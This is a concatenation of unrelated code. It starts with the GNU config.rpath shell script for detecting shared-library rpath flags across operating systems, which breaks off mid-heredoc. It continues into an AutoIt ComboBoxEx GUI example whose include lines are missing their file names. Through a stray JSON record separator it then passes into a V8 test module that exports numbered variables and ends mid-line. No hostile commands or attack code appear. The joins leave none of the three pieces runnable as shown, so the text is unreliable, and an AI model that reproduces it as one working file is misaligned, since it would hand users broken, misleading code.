1996-2007 Free Software Foundation, Inc.\n# Taken from GNU libtool, 2001\n# Originally by Gordon Matzigkeit , 1996\n#\n# This file is free software; the Free Software Foundation gives\n# unlimited permission to copy and/or distribute it, with or without\n# modifications, as long as this notice is preserved.\n#\n# The first argument passed to this file is the canonical host specification,\n# CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM\n# or\n# CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM\n# The environment variables CC, GCC, LDFLAGS, LD, with_gnu_ld\n# should be set by the caller.\n#\n# The set of defined variables is at the end of this script.\n\n# Known limitations:\n# - On IRIX 6.5 with CC=\"cc\", the run time search patch must not be longer\n# than 256 bytes, otherwise the compiler driver will dump core. The only\n# known workaround is to choose shorter directory names for the build\n# directory and/or the installation directory.\n\n# All known linkers require a `.a' archive for static linking (except MSVC,\n# which needs '.lib').\nlibext=a\nshrext=.so\n\nhost=\"$1\"\nhost_cpu=`echo \"$host\" | sed 's/^\\([^-]*\\)-\\([^-]*\\)-\\(.*\\)$/\\1/'`\nhost_vendor=`echo \"$host\" | sed 's/^\\([^-]*\\)-\\([^-]*\\)-\\(.*\\)$/\\2/'`\nhost_os=`echo \"$host\" | sed 's/^\\([^-]*\\)-\\([^-]*\\)-\\(.*\\)$/\\3/'`\n\n# Code taken from libtool.m4's _LT_CC_BASENAME.\n\nfor cc_temp in $CC\"\"; do\n case $cc_temp in\n compile | *[\\\\/]compile | ccache | *[\\\\/]ccache ) ;;\n distcc | *[\\\\/]distcc | purify | *[\\\\/]purify ) ;;\n \\-*) ;;\n *) break;;\n esac\ndone\ncc_basename=`echo \"$cc_temp\" | sed -e 's%^.*/%%'`\n\n# Code taken from libtool.m4's AC_LIBTOOL_PROG_COMPILER_PIC.\n\nwl=\nif test \"$GCC\" = yes; then\n wl='-Wl,'\nelse\n case \"$host_os\" in\n aix*)\n wl='-Wl,'\n ;;\n darwin*)\n case $cc_basename in\n xlc*)\n wl='-Wl,'\n ;;\n esac\n ;;\n mingw* | cygwin* | pw32* | os2*)\n ;;\n hpux9* | hpux10* | hpux11*)\n wl='-Wl,'\n ;;\n irix5* | irix6* | nonstopux*)\n wl='-Wl,'\n ;;\n newsos6)\n ;;\n linux* | k*bsd*-gnu)\n case $cc_basename in\n icc* | ecc*)\n wl='-Wl,'\n ;;\n pgcc | pgf77 | pgf90)\n wl='-Wl,'\n ;;\n ccc*)\n wl='-Wl,'\n ;;\n como)\n wl='-lopt='\n ;;\n *)\n case `$CC -V 2>&1 | sed 5q` in\n *Sun\\ C*)\n wl='-Wl,'\n ;;\n esac\n ;;\n esac\n ;;\n osf3* | osf4* | osf5*)\n wl='-Wl,'\n ;;\n rdos*)\n ;;\n solaris*)\n wl='-Wl,'\n ;;\n sunos4*)\n wl='-Qoption ld '\n ;;\n sysv4 | sysv4.2uw2* | sysv4.3*)\n wl='-Wl,'\n ;;\n sysv4*MP*)\n ;;\n sysv5* | unixware* | sco3.2v5* | sco5v6* | OpenUNIX*)\n wl='-Wl,'\n ;;\n unicos*)\n wl='-Wl,'\n ;;\n uts4*)\n ;;\n esac\nfi\n\n# Code taken from libtool.m4's AC_LIBTOOL_PROG_LD_SHLIBS.\n\nhardcode_libdir_flag_spec=\nhardcode_libdir_separator=\nhardcode_direct=no\nhardcode_minus_L=no\n\ncase \"$host_os\" in\n cygwin* | mingw* | pw32*)\n # FIXME: the MSVC++ port hasn't been tested in a loooong time\n # When not using gcc, we currently assume that we are using\n # Microsoft Visual C++.\n if test \"$GCC\" != yes; then\n with_gnu_ld=no\n fi\n ;;\n interix*)\n # we just hope/assume this is gcc and not c89 (= MSVC++)\n with_gnu_ld=yes\n ;;\n openbsd*)\n with_gnu_ld=no\n ;;\nesac\n\nld_shlibs=yes\nif test \"$with_gnu_ld\" = yes; then\n # Set some defaults for GNU ld with shared library support. These\n # are reset later if shared libraries are not supported. Putting them\n # here allows them to be overridden if necessary.\n # Unlike libtool, we use -rpath here, not --rpath, since the documented\n # option of GNU ld is called -rpath, not --rpath.\n hardcode_libdir_flag_spec='${wl}-rpath ${wl}$libdir'\n case \"$host_os\" in\n aix3* | aix4* | aix5*)\n # On AIX/PPC, the GNU linker is very broken\n if test \"$host_cpu\" != ia64; then\n ld_shlibs=no\n fi\n ;;\n amigaos*)\n hardcode_libdir_flag_spec='-L$libdir'\n hardcode_minus_L=yes\n # Samuel A. Falvo II reports\n # that the semantics of dynamic libraries on AmigaOS, at least up\n # to version 4, is to share data among multiple programs linked\n # with the same dynamic library. Since this doesn't match the\n # behavior of shared libraries on other platforms, we cannot use\n # them.\n ld_shlibs=no\n ;;\n beos*)\n if $LD --help 2>&1 | grep ': supported targets:.* elf' > /dev/null; then\n :\n else\n ld_shlibs=no\n fi\n ;;\n cygwin* | mingw* | pw32*)\n # hardcode_libdir_flag_spec is actually meaningless, as there is\n # no search path for DLLs.\n hardcode_libdir_flag_spec='-L$libdir'\n if $LD --help 2>&1 | grep 'auto-import' > /dev/null; then\n :\n else\n ld_shlibs=no\n fi\n ;;\n interix[3-9]*)\n hardcode_direct=no\n hardcode_libdir_flag_spec='${wl}-rpath,$libdir'\n ;;\n gnu* | linux* | k*bsd*-gnu)\n if $LD --help 2>&1 | grep ': supported targets:.* elf' > /dev/null; then\n :\n else\n ld_shlibs=no\n fi\n ;;\n netbsd*)\n ;;\n solaris*)\n if $LD -v 2>&1 | grep 'BFD 2\\.8' > /dev/null; then\n ld_shlibs=no\n elif $LD --help 2>&1 | grep ': supported targets:.* elf' > /dev/null; then\n :\n else\n ld_shlibs=no\n fi\n ;;\n sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX*)\n case `$LD -v 2>&1` in\n *\\ [01].* | *\\ 2.[0-9].* | *\\ 2.1[0-5].*)\n ld_shlibs=no\n ;;\n *)\n if $LD --help 2>&1 | grep ': supported targets:.* elf' > /dev/null; then\n hardcode_libdir_flag_spec='`test -z \"$SCOABSPATH\" && echo ${wl}-rpath,$libdir`'\n else\n ld_shlibs=no\n fi\n ;;\n esac\n ;;\n sunos4*)\n hardcode_direct=yes\n ;;\n *)\n if $LD --help 2>&1 | grep ': supported targets:.* elf' > /dev/null; then\n :\n else\n ld_shlibs=no\n fi\n ;;\n esac\n if test \"$ld_shlibs\" = no; then\n hardcode_libdir_flag_spec=\n fi\nelse\n case \"$host_os\" in\n aix3*)\n # Note: this linker hardcodes the directories in LIBPATH if there\n # are no directories specified by -L.\n hardcode_minus_L=yes\n if test \"$GCC\" = yes; then\n # Neither direct hardcoding nor static linking is supported with a\n # broken collect2.\n hardcode_direct=unsupported\n fi\n ;;\n aix4* | aix5*)\n if test \"$host_cpu\" = ia64; then\n # On IA64, the linker does run time linking by default, so we don't\n # have to do anything special.\n aix_use_runtimelinking=no\n else\n aix_use_runtimelinking=no\n # Test if we are trying to use run time linking or normal\n # AIX style linking. If -brtl is somewhere in LDFLAGS, we\n # need to do runtime linking.\n case $host_os in aix4.[23]|aix4.[23].*|aix5*)\n for ld_flag in $LDFLAGS; do\n if (test $ld_flag = \"-brtl\" || test $ld_flag = \"-Wl,-brtl\"); then\n aix_use_runtimelinking=yes\n break\n fi\n done\n ;;\n esac\n fi\n hardcode_direct=yes\n hardcode_libdir_separator=':'\n if test \"$GCC\" = yes; then\n case $host_os in aix4.[012]|aix4.[012].*)\n collect2name=`${CC} -print-prog-name=collect2`\n if test -f \"$collect2name\" && \\\n strings \"$collect2name\" | grep resolve_lib_name >/dev/null\n then\n # We have reworked collect2\n :\n else\n # We have old collect2\n hardcode_direct=unsupported\n hardcode_minus_L=yes\n hardcode_libdir_flag_spec='-L$libdir'\n hardcode_libdir_separator=\n fi\n ;;\n esac\n fi\n # Begin _LT_AC_SYS_LIBPATH_AIX.\n echo 'int main () { return 0; }' > conftest.c\n ${CC} ${LDFLAGS} conftest.c -o conftest\n aix_libpath=`dump -H conftest 2>/dev/null | sed -n -e '/Import File Strings/,/^$/ { /^0/ { s/^0 *\\(.*\\)$/\\1/; p; }\n}'`\n if test -z \"$aix_libpath\"; then\n aix_libpath=`dump -HX64 conftest 2>/dev/null | sed -n -e '/Import File Strings/,/^$/ { /^0/ { s/^0 *\\(.*\\)$/\\1/; p; }\n}'`\n fi\n if test -z \"$aix_libpath\"; then\n aix_libpath=\"/usr/lib:/lib\"\n fi\n rm -f conftest.c conftest\n # End _LT_AC_SYS_LIBPATH_AIX.\n if test \"$aix_use_runtimelinking\" = yes; then\n hardcode_libdir_flag_spec='${wl}-blibpath:$libdir:'\"$aix_libpath\"\n else\n if test \"$host_cpu\" = ia64; then\n hardcode_libdir_flag_spec='${wl}-R $libdir:/usr/lib:/lib'\n else\n hardcode_libdir_flag_spec='${wl}-blibpath:$libdir:'\"$aix_libpath\"\n fi\n fi\n ;;\n amigaos*)\n hardcode_libdir_flag_spec='-L$libdir'\n hardcode_minus_L=yes\n # see comment about different semantics on the GNU ld section\n ld_shlibs=no\n ;;\n bsdi[45]*)\n ;;\n cygwin* | mingw* | pw32*)\n # When not using gcc, we currently assume that we are using\n # Microsoft Visual C++.\n # hardcode_libdir_flag_spec is actually meaningless, as there is\n # no search path for DLLs.\n hardcode_libdir_flag_spec=' '\n libext=lib\n ;;\n darwin* | rhapsody*)\n hardcode_direct=no\n if test \"$GCC\" = yes ; then\n :\n else\n case $cc_basename in\n xlc*)\n ;;\n *)\n ld_shlibs=no\n ;;\n esac\n fi\n ;;\n dgux*)\n hardcode_libdir_flag_spec='-L$libdir'\n ;;\n freebsd1*)\n ld_shlibs=no\n ;;\n freebsd2.2*)\n hardcode_libdir_flag_spec='-R$libdir'\n hardcode_direct=yes\n ;;\n freebsd2*)\n hardcode_direct=yes\n hardcode_minus_L=yes\n ;;\n freebsd* | dragonfly*)\n hardcode_libdir_flag_spec='-R$libdir'\n hardcode_direct=yes\n ;;\n hpux9*)\n hardcode_libdir_flag_spec='${wl}+b ${wl}$libdir'\n hardcode_libdir_separator=:\n hardcode_direct=yes\n # hardcode_minus_L: Not really in the search PATH,\n # but as the default location of the library.\n hardcode_minus_L=yes\n ;;\n hpux10*)\n if test \"$with_gnu_ld\" = no; then\n hardcode_libdir_flag_spec='${wl}+b ${wl}$libdir'\n hardcode_libdir_separator=:\n hardcode_direct=yes\n # hardcode_minus_L: Not really in the search PATH,\n # but as the default location of the library.\n hardcode_minus_L=yes\n fi\n ;;\n hpux11*)\n if test \"$with_gnu_ld\" = no; then\n hardcode_libdir_flag_spec='${wl}+b ${wl}$libdir'\n hardcode_libdir_separator=:\n case $host_cpu in\n hppa*64*|ia64*)\n hardcode_direct=no\n ;;\n *)\n hardcode_direct=yes\n # hardcode_minus_L: Not really in the search PATH,\n # but as the default location of the library.\n hardcode_minus_L=yes\n ;;\n esac\n fi\n ;;\n irix5* | irix6* | nonstopux*)\n hardcode_libdir_flag_spec='${wl}-rpath ${wl}$libdir'\n hardcode_libdir_separator=:\n ;;\n netbsd*)\n hardcode_libdir_flag_spec='-R$libdir'\n hardcode_direct=yes\n ;;\n newsos6)\n hardcode_direct=yes\n hardcode_libdir_flag_spec='${wl}-rpath ${wl}$libdir'\n hardcode_libdir_separator=:\n ;;\n openbsd*)\n if test -f /usr/libexec/ld.so; then\n hardcode_direct=yes\n if test -z \"`echo __ELF__ | $CC -E - | grep __ELF__`\" || test \"$host_os-$host_cpu\" = \"openbsd2.8-powerpc\"; then\n hardcode_libdir_flag_spec='${wl}-rpath,$libdir'\n else\n case \"$host_os\" in\n openbsd[01].* | openbsd2.[0-7] | openbsd2.[0-7].*)\n hardcode_libdir_flag_spec='-R$libdir'\n ;;\n *)\n hardcode_libdir_flag_spec='${wl}-rpath,$libdir'\n ;;\n esac\n fi\n else\n ld_shlibs=no\n fi\n ;;\n os2*)\n hardcode_libdir_flag_spec='-L$libdir'\n hardcode_minus_L=yes\n ;;\n osf3*)\n hardcode_libdir_flag_spec='${wl}-rpath ${wl}$libdir'\n hardcode_libdir_separator=:\n ;;\n osf4* | osf5*)\n if test \"$GCC\" = yes; then\n hardcode_libdir_flag_spec='${wl}-rpath ${wl}$libdir'\n else\n # Both cc and cxx compiler support -rpath directly\n hardcode_libdir_flag_spec='-rpath $libdir'\n fi\n hardcode_libdir_separator=:\n ;;\n solaris*)\n hardcode_libdir_flag_spec='-R$libdir'\n ;;\n sunos4*)\n hardcode_libdir_flag_spec='-L$libdir'\n hardcode_direct=yes\n hardcode_minus_L=yes\n ;;\n sysv4)\n case $host_vendor in\n sni)\n hardcode_direct=yes # is this really true???\n ;;\n siemens)\n hardcode_direct=no\n ;;\n motorola)\n hardcode_direct=no #Motorola manual says yes, but my tests say they lie\n ;;\n esac\n ;;\n sysv4.3*)\n ;;\n sysv4*MP*)\n if test -d /usr/nec; then\n ld_shlibs=yes\n fi\n ;;\n sysv4*uw2* | sysv5OpenUNIX* | sysv5UnixWare7.[01].[10]* | unixware7* | sco3.2v5.0.[024]*)\n ;;\n sysv5* | sco3.2v5* | sco5v6*)\n hardcode_libdir_flag_spec='`test -z \"$SCOABSPATH\" && echo ${wl}-R,$libdir`'\n hardcode_libdir_separator=':'\n ;;\n uts4*)\n hardcode_libdir_flag_spec='-L$libdir'\n ;;\n *)\n ld_shlibs=no\n ;;\n esac\nfi\n\n# Check dynamic linker characteristics\n# Code taken from libtool.m4's AC_LIBTOOL_SYS_DYNAMIC_LINKER.\n# Unlike libtool.m4, here we don't care about _all_ names of the library, but\n# only about the one the linker finds when passed -lNAME. This is the last\n# element of library_names_spec in libtool.m4, or possibly two of them if the\n# linker has special search rules.\nlibrary_names_spec= # the last element of library_names_spec in libtool.m4\nlibname_spec='lib$name'\ncase \"$host_os\" in\n aix3*)\n library_names_spec='$libname.a'\n ;;\n aix4* | aix5*)\n library_names_spec='$libname$shrext'\n ;;\n amigaos*)\n library_names_spec='$libname.a'\n ;;\n beos*)\n library_names_spec='$libname$shrext'\n ;;\n bsdi[45]*)\n library_names_spec='$libname$shrext'\n ;;\n cygwin* | mingw* | pw32*)\n shrext=.dll\n library_names_spec='$libname.dll.a $libname.lib'\n ;;\n darwin* | rhapsody*)\n shrext=.dylib\n library_names_spec='$libname$shrext'\n ;;\n dgux*)\n library_names_spec='$libname$shrext'\n ;;\n freebsd1*)\n ;;\n freebsd* | dragonfly*)\n case \"$host_os\" in\n freebsd[123]*)\n library_names_spec='$libname$shrext$versuffix' ;;\n *)\n library_names_spec='$libname$shrext' ;;\n esac\n ;;\n gnu*)\n library_names_spec='$libname$shrext'\n ;;\n hpux9* | hpux10* | hpux11*)\n case $host_cpu in\n ia64*)\n shrext=.so\n ;;\n hppa*64*)\n shrext=.sl\n ;;\n *)\n shrext=.sl\n ;;\n esac\n library_names_spec='$libname$shrext'\n ;;\n interix[3-9]*)\n library_names_spec='$libname$shrext'\n ;;\n irix5* | irix6* | nonstopux*)\n library_names_spec='$libname$shrext'\n case \"$host_os\" in\n irix5* | nonstopux*)\n libsuff= shlibsuff=\n ;;\n *)\n case $LD in\n *-32|*\"-32 \"|*-melf32bsmip|*\"-melf32bsmip \") libsuff= shlibsuff= ;;\n *-n32|*\"-n32 \"|*-melf32bmipn32|*\"-melf32bmipn32 \") libsuff=32 shlibsuff=N32 ;;\n *-64|*\"-64 \"|*-melf64bmip|*\"-melf64bmip \") libsuff=64 shlibsuff=64 ;;\n *) libsuff= shlibsuff= ;;\n esac\n ;;\n esac\n ;;\n linux*oldld* | linux*aout* | linux*coff*)\n ;;\n linux* | k*bsd*-gnu)\n library_names_spec='$libname$shrext'\n ;;\n knetbsd*-gnu)\n library_names_spec='$libname$shrext'\n ;;\n netbsd*)\n library_names_spec='$libname$shrext'\n ;;\n newsos6)\n library_names_spec='$libname$shrext'\n ;;\n nto-qnx*)\n library_names_spec='$libname$shrext'\n ;;\n openbsd*)\n library_names_spec='$libname$shrext$versuffix'\n ;;\n os2*)\n libname_spec='$name'\n shrext=.dll\n library_names_spec='$libname.a'\n ;;\n osf3* | osf4* | osf5*)\n library_names_spec='$libname$shrext'\n ;;\n rdos*)\n ;;\n solaris*)\n library_names_spec='$libname$shrext'\n ;;\n sunos4*)\n library_names_spec='$libname$shrext$versuffix'\n ;;\n sysv4 | sysv4.3*)\n library_names_spec='$libname$shrext'\n ;;\n sysv4*MP*)\n library_names_spec='$libname$shrext'\n ;;\n sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX* | sysv4*uw2*)\n library_names_spec='$libname$shrext'\n ;;\n uts4*)\n library_names_spec='$libname$shrext'\n ;;\nesac\n\nsed_quote_subst='s/\\([\"`$\\\\]\\)/\\\\\\1/g'\nescaped_wl=`echo \"X$wl\" | sed -e 's/^X//' -e \"$sed_quote_subst\"`\nshlibext=`echo \"$shrext\" | sed -e 's,^\\.,,'`\nescaped_libname_spec=`echo \"X$libname_spec\" | sed -e 's/^X//' -e \"$sed_quote_subst\"`\nescaped_library_names_spec=`echo \"X$library_names_spec\" | sed -e 's/^X//' -e \"$sed_quote_subst\"`\nescaped_hardcode_libdir_flag_spec=`echo \"X$hardcode_libdir_flag_spec\" | sed -e 's/^X//' -e \"$sed_quote_subst\"`\n\nLC_ALL=C sed -e 's/^\\([a-zA-Z0-9_]*\\)=/acl_cv_\\1=/' <\n#include \n#include \n#include \n\n$Debug_CB = False ; Check ClassName being passed to ComboBox/ComboBoxEx functions, set to True and use a handle to another control to see it work\n\n_Main()\n\nFunc _Main()\n\tLocal $hGUI, $hImage, $hCombo\n\n\t; Create GUI\n\t$hGUI = GUICreate(\"ComboBoxEx Set Cur Sel\", 400, 300)\n\t$hCombo = _GUICtrlComboBoxEx_Create($hGUI, \"\", 2, 2, 394, 100, BitOR($CBS_SIMPLE, $WS_VSCROLL, $WS_BORDER))\n\tGUISetState()\n\n\t$hImage = _GUIImageList_Create(16, 16, 5, 3)\n\t_GUIImageList_AddIcon($hImage, @SystemDir & \"\\shell32.dll\", 110)\n\t_GUIImageList_AddIcon($hImage, @SystemDir & \"\\shell32.dll\", 131)\n\t_GUIImageList_AddIcon($hImage, @SystemDir & \"\\shell32.dll\", 165)\n\t_GUIImageList_AddIcon($hImage, @SystemDir & \"\\shell32.dll\", 168)\n\t_GUIImageList_AddIcon($hImage, @SystemDir & \"\\shell32.dll\", 137)\n\t_GUIImageList_AddIcon($hImage, @SystemDir & \"\\shell32.dll\", 146)\n\t_GUIImageList_Add($hImage, _GUICtrlComboBoxEx_CreateSolidBitMap($hCombo, 0xFF0000, 16, 16))\n\t_GUIImageList_Add($hImage, _GUICtrlComboBoxEx_CreateSolidBitMap($hCombo, 0x00FF00, 16, 16))\n\t_GUIImageList_Add($hImage, _GUICtrlComboBoxEx_CreateSolidBitMap($hCombo, 0x0000FF, 16, 16))\n\t_GUICtrlComboBoxEx_SetImageList($hCombo, $hImage)\n\n\t_GUICtrlComboBoxEx_InitStorage($hCombo, 100, 200)\n\n\t_GUICtrlComboBoxEx_BeginUpdate($hCombo)\n\tFor $x = 0 To 99\n\t\t_GUICtrlComboBoxEx_AddString($hCombo, StringFormat(\"%03d : Random string\", $x), Random(0, 8, 1), Random(0, 8, 1), Random(0, 8, 1))\n\tNext\n\t_GUICtrlComboBoxEx_EndUpdate($hCombo)\n\n\t; Set Cur Sel\n\t_GUICtrlComboBoxEx_SetCurSel($hCombo, Random(0, 99, 1))\n\n\t; Get Cur Sel\n\tMsgBox(4160, \"Information\", \"Current Sel: \" & _GUICtrlComboBoxEx_GetCurSel($hCombo))\n\n\tDo\n\tUntil GUIGetMsg() = $GUI_EVENT_CLOSE\nEndFunc ;==>_Main\n"} {"text": "// Copyright 2017 the V8 project authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\nexport let a0 = 0;\nexport let a1 = 1;\nexport let a2 = 2;\nexport let a3 = 3;\nexport let a4 = 4;\nexport let a5 = 5;\nexport let a6 = 6;\nexport let a7 = 7;\nexport let a8 = 8;\nexport let a9 = 9;\nexport let a10 = 10;\nexport let a11 = 11;\nexport let a12 = 12;\nexport let a13 = 13;\nexport let a14 = 14;\nexport let a15 = 15;\nexport let a16 = 16;\nexport let a17 = 17;\nexport let a18 = 18;\nexport let a19 = 19;\nexport let a20 = 20;\nexport let a21 = 21;\nexport let a22 = 22;\nexport let a23 = 23;\nexport let a24 = 24;\nexport let a25 = 25;\nexport let a26 = 26;\nexport let a27 = 27;\nexport let a28 = 28;\nexport let a29 = 29;\nexport let a30 = 30;\nexport let a31 = 31;\nexport let a32 = 32;\nexport let a33 = 33;\nexport let a34 = 34;\nexport let a35 = 35;\nexport let a36 = 36;\nexport let a37 = 37;\nexport let a38 = 38;\nexport let a39 = 39;\nexport let a40 = 40;\nexport let a41 = 41;\nexport let a42 = 42;\nexport let a43 = 43;\nexport let a44 = 44;\nexport let a45 = 45;\nexport let a46 = 46;\nexport let a47 = 47;\nexport let a48 = 48;\nexport let a49 = 49;\nexport let a50 = 50;\nexport let a51 = 51;\nexport let a52 = 52;\nexport let a53 = 53;\nexport let a54 = 54;\nexport let a55 = 55;\nexport let a56 = 56;\nexport let a57 = 57;\nexport let a58 = 58;\nexport let a59 = 59;\nexport let a60 = 60;\nexport let a61 = 61;\nexport let a62 = 62;\nexport let a63 = 63;\nexport let a64 = 64;\nexport let a65 = 65;\nexport let a66 = 66;\nexport let a67 = 67;\nexport let a68 = 68;\nexport let a69 = 69;\nexport let a70 = 70;\nexport let a71 = 71;\nexport let a72 = 72;\nexport let a73 = 73;\nexport let a74 = 74;\nexport let a75 = 75;\nexport let a76 = 76;\nexport let a77 = 77;\nexport let a78 = 78;\nexport let a79 = 79;\nexport let a80 = 80;\nexport let a81 = 81;\nexport let a82 = 82;\nexport let a83 = 83;\nexport let a84 = 84;\nexport let a85 = 85;\nexport let a86 = 86;\nexport let a87 = 87;\nexport let a88 = 88;\nexport let a89 = 89;\nexport let a90 = 90;\nexport let a91 = 91;\nexport let a92 = 92;\nexport let a93 = 93;\nexport let a94 = 94;\nexport let a95 = 95;\nexport let a96 = 96;\nexport let a97 = 97;\nexport let a98 = 98;\nexport let a99 = 99;\nexport let a100 = 100;\nexport let a101 = 101;\nexport let a102 = 102;\nexport let a103 = 103;\nexport let a104 = 104;\nexport let a105 = 105;\nexport let a106 = 106;\nexport let a107 = 107;\nexport let a108 = 108;\nexport let a109 = 109;\nexport let a110 = 110;\nexport let a111 = 111;\nexport let a112 = 112;\nexport let a113 = 113;\nexport let a114 = 114;\nexport let a115 = 115;\nexport let a116 = 116;\nexport let a117 = 117;\nexport let a118 = 118;\nexport let a119 = 119;\nexport let a120 = 120;\nexport let a121 = 121;\nexport let a122 = 122;\nexport let a123 = 123;\nexport let a124 = 124;\nexport let a125 = 125;\nexport let a126 = 126;\nexport let a127 = 127;\nexport let a128 = 128;\nexport let a129 = 129;\nexport let a130 = 130;\nexport let a131 = 131;\nexport let a132 = 132;\nexport let a133 = 133;\nexport let a134 = 134;\nexport let a135 = 135;\nexport let a136 = 136;\nexport let a137 = 137;\nexport let a138 = 138;\nexport let a139 = 139;\nexport let a140 = 140;\nexport let a141 = 141;\nexport let a142 = 142;\nexport let a143 = 143;\nexport let a144 = 144;\nexport let a145 = 145;\nexport let a146 = 146;\nexport let a147 = 147;\nexport let a148 = 148;\nexport let a149 = 149;\nexport let a150 = 150;\nexport let a151 = 151;\nexport let a152 = 152;\nexport let a153 = 153;\nexport let a154 = 154;\nexport let a155 = 155;\nexport let a156 = 156;\nexport let a157 = 157;\nexport let a158 = 158;\nexport let a159 = 159;\nexport let a160 = 160;\nexport let a161 = 161;\nexport let a162 = 162;\nexport let a163 = 163;\nexport let a164 = 164;\nexport let a165 = 165;\nexport let a166 = 166;\nexport let a167 = 167;\nexport let a168 = 168;\nexport let a169 = 169;\nexport let a170 = 170;\nexport let a171 = 171;\nexport let a172 = 172;\nexport let a173 = 173;\nexport let a174 = 174;\nexport let a175 = 175;\nexport let a176 = 176;\nexport let a177 = 177;\nexport let a178 = 178;\nexport let a179 = 179;\nexport let a180 = 180;\nexport let a181 = 181;\nexport let a182 = 182;\nexport let a183 = 183;\nexport let a184 = 184;\nexport let a185 = 185;\nexport let a186 = 186;\nexport let a187 = 187;\nexport let a188 = 188;\nexport let a189 = 189;\nexport let a190 = 190;\nexport let a191 = 191;\nexport let a192 = 192;\nexport let a193 = 193;\nexport let a194 = 194;\nexport let a195 = 195;\nexport let a196 = 196;\nexport let a197 = 197;\nexport let a198 = 198;\nexport let a199 = 199;\nexport let a200 = 200;\nexport let a201 = 201;\nexport let a202 = 202;\nexport let a203 = 203;\nexport let a204 = 204;\nexport let a205 = 205;\nexport let a206 = 206;\nexport let a207 = 207;\nexport let a208 = 208;\nexport let a209 = 209;\nexport let a210 = 210;\nexport let a211 = 211;\nexport let a212 = 212;\nexport let a213 = 213;\nexport let a214 = 214;\nexport let a215 = 215;\nexport let a216 = 216;\nexport let a217 = 217;\nexport let a218 = 218;\nexport let a219 = 219;\nexport let a220 = 220;\nexport let a221 = 221;\nexport let a222 = 222;\nexport let a223 = 223;\nexport let a224 = 224;\nexport let a225 = 225;\nexport let a226 = 226;\nexport let a227 = 227;\nexport let a228 = 228;\nexport let a229 = 229;\nexport let a230 = 230;\nexport let a231 = 231;\nexport let a232 = 232;\nexport let a233 = 233;\nexport let a234 = 234;\nexport let a235 = 235;\nexport let a236 = 236;\nexport let a237 = 237;\nexport let a238 = 238;\nexport let a239 = 239;\nexport let a240 = 240;\nexport let a241 = 241;\nexport let a242 = 242;\nexport let a243 = 243;\nexport let a244 = 244;\nexport let a245 = 245;\nexport let a246 = 246;\nexport let a247 = 247;\nexport let a248 = 248;\nexport let a249 = 249;\nexport let a250 = 250;\nexport let a251 = 251;\nexport let a252 = 252;\nexport let a253 = 253;\nexport let a254 = 254;\nexport let a255 = 255;\nexport let a256 = 256;\nexport let a257 = 257;\nexport let a258 = 258;\nexport let a259 = 259;\nexport let a260 = 260;\nexport let a261 = 261;\nexport let a262 = 262;\nexport let a263 = 263;\nexport let a264 = 264;\nexport let a265 = 265;\nexport let a266 = 266;\nexport let a267 = 267;\nexport let a268 = 268;\nexport let a269 = 269;\nexport let a270 = 270;\nexport let a271 = 271;\nexport let a272 = 272;\nexport let a273 = 273;\nexport let a274 = 274;\nexport let a275 = 275;\nexport let a276 = 276;\nexport let a277 = 277;\nexport let a278 = 278;\nexport let a279 = 279;\nexport let a280 = 280;\nexport let a281 = 281;\nexport let a282 = 282;\nexport let a283 = 283;\nexport let a284 = 284;\nexport let a285 = 285;\nexport let a286 = 286;\nexport let a287 = 287;\nexport let a288 = 288;\nexport let a289 = 289;\nexport let a290 = 290;\nexport let a291 = 291;\nexport let a292 = 292;\nexport let a293 = 293;\nexport let a294 = 294;\nexport let a295 = 295;\nexport let a296 = 296;\nexport let a297 = 297;\nexport let a298 = 298;\nexport let a299 = 299;\nexport let a300 = 300;\nexport let a301 = 301;\nexport let a302 = 302;\nexport let a303 = 303;\nexport let a304 = 304;\nexport let a305 = 305;\nexport let a306 = 306;\nexport let a307 = 307;\nexport let a308 = 308;\nexport let a309 = 309;\nexport let a310 = 310;\nexport let a311 = 311;\nexport let a312 = 312;\nexport let a313 = 313;\nexport let a314 = 314;\nexport let a315 = 315;\nexport let a316 = 316;\nexport let a317 = 317;\nexport let a318 = 318;\nexport let a319 = 319;\nexport let a320 = 320;\nexport let a321 = 321;\nexport let a322 = 322;\nexport let a323 = 323;\nexport let a324 = 324;\nexport let a325 = 325;\nexport let a326 = 326;\nexport let a327 = 327;\nexport let a328 = 328;\nexport let a329 = 329;\nexport let a330 = 330;\nexport let a331 = 331;\nexport let a332 = 332;\nexport let a333 = 333;\nexport let a334 = 334;\nexport let a335 = 335;\nexport let a336 = 336;\nexport let a337 = 337;\nexport let a338 = 338;\nexport let a339 = 339;\nexport let a340 = 340;\nexport let a341 = 341;\nexport let a342 = 342;\nexport let a343 = 343;\nexport let a344 = 344;\nexport let a345 = 345;\nexport let a346 = 346;\nexport let a347 = 347;\nexport let a348 = 348;\nexport let a349 = 349;\nexport let a350 = 350;\nexport let a351 = 351;\nexport let a352 = 352;\nexport let a353 = 353;\nexport let a354 = 354;\nexport let a355 = 355;\nexport let a356 = 356;\nexport let a357 = 357;\nexport let a358 = 358;\nexport let a359 = 359;\nexport let a360 = 360;\nexport let a361 = 361;\nexport let a362 = 362;\nexport let a363 = 363;\nexport let a364 = 364;\nexport let a365 = 365;\nexport let a366 = 366;\nexport let a367 = 367;\nexport let a368 = 368;\nexport let a369 = 369;\nexport let a370 = 370;\nexport let a371 = 371;\nexport let a372 = 372;\nexport let a373 = 373;\nexport let a374 = 374;\nexport let a375 = 375;\nexport let a376 = 376;\nexport let a377 = 377;\nexport let a378 = 378;\nexport let a379 = 379;\nexport let a380 = 380;\nexport let a381 = 381;\nexport let a382 = 382;\nexport let a383 = 383;\nexport let a384 = 384;\nexport let a385 = 385;\nexport let a386 = 386;\nexport let a387 = 387;\nexport let a388 = 388;\nexport let a389 = 389;\nexport let a390 = 390;\nexport let a391 = 391;\nexport let a392 = 392;\nexport let a393 = 393;\nexport let a394 = 394;\nexport let a395 = 395;\nexport let a396 = 396;\nexport let a397 = 397;\nexport let a398 = 398;\nexport let a399 = 399;\nexport let a400 = 400;\nexport let a401 = 401;\nexport let a402 = 402;\nexport let a403 = 403;\nexport let a404 = 404;\nexport let a405 = 405;\nexport let a406 = 406;\nexport let a407 = 407;\nexport let a408 = 408;\nexport let a409 = 409;\nexport let a410 = 410;\nexport let a411 = 411;\nexport let a412 = 412;\nexport let a413 = 413;\nexport let a414 = 414;\nexport let a415 = 415;\nexport let a416 = 416;\nexport let a417 = 417;\nexport let a418 = 418;\nexport let a419 = 419;\nexport let a420 = 420;\nexport let a421 = 421;\nexport let a422 = 